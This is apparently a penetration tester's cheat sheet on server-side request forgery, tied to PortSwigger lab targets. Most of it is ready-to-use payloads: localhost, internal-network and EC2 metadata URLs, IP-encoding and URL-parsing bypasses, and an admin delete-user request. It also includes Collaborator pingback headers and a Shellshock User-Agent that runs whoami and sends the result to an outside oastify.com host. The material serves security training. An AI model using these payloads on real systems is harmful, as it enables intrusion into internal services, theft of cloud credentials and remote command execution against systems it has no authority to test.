Server-Side Request Forgery (SSRF)

SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation.

Common exploitation paths:

• Accessing Cloud metadata

• Leaking files on the server

• Network discovery, port scanning with the SSRF

• Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server

Identify Potential SSRF Entry Points

🔍 Look for parameters, headers, and input fields that accept URLs:

• URL parameters (?url=, ?link=, ?redirect=, ?callback=, ?next=, etc.)

• JSON / XML body ("image": "http://example.com/img.jpg")

• Headers (Referer, X-Forwarded-For, Host, etc.)

• Hidden form fields (<input type="hidden" name="webhook_url" value="http://example.com/webhook">)

• Redirect behavior on function, parameter, field.

• OAuth / API integrations that retrieve external resources

Common SSRF Payloads

#Using localhost
http://localhost:80
http://localhost:80/admin
http://localhost:22
https://localhost:443

#Using 127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:22
https://127.0.0.1:443

#Using 0.0.0.0
http://0.0.0.0:80
http://0.0.0.0:22
https://0.0.0.0:443

#Alternative Schemes:
file:// (Read local files)
dict:// (Interacting with dict service)
ftp://, gopher://, sftp:// (Bypass HTTP filters)

#Fetch EC2 metatadata
http://169.254.169.254/latest/meta-data/

Enumerate internal network via SSRF

http://192.168.0.x/admin
http://172.16.1.x/admin
http://10.10.x.x:80

Bypass Localhost with on SSRF

#Encode at least one character two/three times and send the request
http://127.0.0.1/%61dmin #<- a is encoded
http://127.0.0.1/%2561dmin
http://127.1/%61dmin
http://127.1/%2561dmin

#Enconde the (#) more than two times and try to use credentials 
http://username@stock.weliketoshop.net/
http://username#@stock.weliketoshop.net/
http://127.0.0.1%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos

#Obfuscation & Encoding:
http://127.0.0.1 → http://2130706433 (Decimal IP)
http://127.0.0.1 → http://0x7f000001 (Hexadecimal)
http://127.0.0.1 → http://127.1 (Shortened IP)

IPv4 Address to IP Decimal Conversion | IPAddressGuideIPAddressGuide.com

Blind SSRF with Shellshock exploitation

Burp suite Detection via collaborator-everywhere pro

Manual Testing every request you visit:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@wuumc5cpduoqzh107t5wppfif9l1ip7.oastify.
Referer: http://t82jq2qmrr2ndefxlqjt3mtft6zyrmg.oastify.com/ref
X-Originating-IP: spoofed.4v0udddxe2py0p288164qxgqghm8nwc.oastify.com
Client-IP: spoofed.176rpapuqz1vcme5kyi12usnsey50tp.oastify.com
X-Real-IP: spoofed.ufdkx3xnys9okfmysrquan0g076y9my.oastify.com
X-Wap-Profile: http://spli717l8qjmudww2p0sklaea5gwkk9.oastify.com/wap.xml
X-Forwarded-For: spoofed.w52mn5npouzqahc0itgw0pqiq9w01oq.oastify.com
True-Client-IP: spoofed.i0j8iribjguc537mdfbivbl4lvrnhb6.oastify.com
CF-Connecting_IP: spoofed.ei040n071cc8nzpivbted7303r9j07p.oastify.com
From: root@ek242n273ce8pzrixbvef7505rbj47t.oastify.com
X-Client-IP: spoofed.ffy5xox8yd99k0mjscqfa8010s6k08p.oastify.com
Forwarded: for=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;by=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;host=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com
Contact: root@1dfrvavuwz7vimk5qyo18uynye460up.oastify.com

Exploit:

GET /product?productId=2 HTTP/2
Host: 0ae1005304d447f3ed42f58400070006.web-security-academy.net
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).k1m0koo7mr2o2l4qe4zig77g278ywokd.oastify.com
Referer: http://192.168.0.X:8080

GitHub - PortSwigger/collaborator-everywhere: A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp CollaboratorGitHub